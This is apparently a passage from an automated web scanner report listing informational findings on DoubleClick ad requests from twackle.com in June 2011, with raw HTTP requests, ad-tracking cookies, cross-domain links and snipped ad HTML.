http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246349&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965246064&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=45&xpc=5bIpuczrxr&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://s0.2mdn.net/2917862/Q211_CBCS_AQ_BDL_94.85x12-NX_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246349&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965246064&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=45&xpc=5bIpuczrxr&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.129. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986620&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968620322&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968619989&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=409403925&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=69&xpc=CjV9skZctO&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Dovico.com%26adT%3DOnline%2BTimesheet%2BTracking%26adU%3Dwww.Comcast.com/Xfinity%26adT%3DComcast%25C2%25AE%2B%252499%2BBundle%2BOffer%26adU%3DDSLExtreme.com%26adT%3DHigh%2BSpeed%2BInternet%2B14.95%26gl%3DUS&usg=AFQjCNHrrDwK-kLsuivI0duPRgeguwK9aA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986620&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968620322&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968619989&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=409403925&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=69&xpc=CjV9skZctO&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.130. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986317&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968315590&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968315302&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1899673145&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1718&xpc=LRWFCLTZuX&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BDeals%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26gl%3DUS&usg=AFQjCNG52rCNcWiYKj5aIFLx8uYQXRx8FA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986317&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968315590&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307968315302&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1899673145&ga_fc=1&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1718&xpc=LRWFCLTZuX&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.131. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://a.adroll.com/j/rolling.js

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.132. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307981999&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963999667&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307963998240&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299%2C33895142&fu=0&ifi=3&dtd=14&xpc=EsGr4fkYE4&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://s0.2mdn.net/2757332/728X90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEpTkB3LTjgB5FhTNGI0iNGGDHgzA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307981999&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2F&dt=1307963999667&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307963998240&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=342056587&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=13&biw=1049&bih=926&eid=33895299%2C33895142&fu=0&ifi=3&dtd=14&xpc=EsGr4fkYE4&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:26:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 8432
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:26:21 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
k.net%2Fclick%253Bh%253Dv8%2F3b25%2F3%2F0%2F%252a%2Ff%253B241431579%253B0-0%253B0%253B63859884%253B3454-728%2F90%253B42233063%2F42250850%2F1%253B%253B%257Esscs%253D%253fhttp://www3.samsclub.com/meals"><img src="http://s0.2mdn.net/2757332/728X90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEpTkB3LTjgB5FhTNGI0iNGGDHgzA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.133. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307980481&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307962973566&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307962973945&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1864598234&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&fu=0&ifi=1&dtd=5814&xpc=JIorAZ3OEK&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/fansided/General_Twackle_Widget%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.csnbayarea.com%26adT%3DVladimir%2BRadmanovic%26gl%3DUS&usg=AFQjCNH7IWevGZ6HQIUAkBB1aXHYLs_fYA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307980481&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307962973566&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307962973945&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1864598234&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&fu=0&ifi=1&dtd=5814&xpc=JIorAZ3OEK&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.134. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=1367093073&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%2526num%253D1%2526sig%253DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dconstantcontact.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGYrvtZV_VHsLMlyVa2Hpm_0LKr7g

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.135. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983860&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965860274&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965859956&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=91&xpc=9d6ucqWJf8&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://exch.quantserve.com/pixel/p-7fziOTiEM1bCE.gif?media=ad&p=TfX5pAAPGFsK5XDCj5UngKLpxOHkyekAUKtc6Q&r=881917266&rand=56512&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.20,_imp.optdr.0&rtbip=64.74.116.145&rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAcyVnuwNkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox
http://view.atdmt.com/MON/iview/285072717/direct/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBW6JpPn1TduwPMLhlQeAz9T8CI6foZQCzqPYkRbKmIe8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHQlMDzA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgC9vHKCagDAegDiALoA7UI9QMAAADEgAaXo8vC4pXe_1g%26num%3D1%26sig%3DAGiWqtz4tI2Frd2NdbvP7qLYxWMh5UNfCQ%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://exch.quantserve.com/r?a=p-7fziOTiEM1bCE;labels=_qc.clk,_click.adserver.rtb,_click.rand.56512;rtbip=64.74.116.145;rtbdata2=EAAaD01vbnN0ZXJfSmFuMS0xMSCpCiicFjCT0h46IGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzQgYIn9oJEG1QAVooem04X1pjNXBaRFBYT0RreHpUOXhaNTl1UFdQWE16NHd6em1BaUVRYWgbdXkNTj6AAcyVnuwNkAHEzQmgAQGoAdTTCbABAroBHUNBRVNFRGdySkwzalhUclN2RnpaRS1OUzJJazox;redirect=
http://view.atdmt.com/MON/view/285072717/direct/01/

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983860&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965860274&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307965859956&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1764523785&ga_fc=1&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=91&xpc=9d6ucqWJf8&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:51:01 GMT
Server: cafe
Cache-Control: private
Content-Length: 4129
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
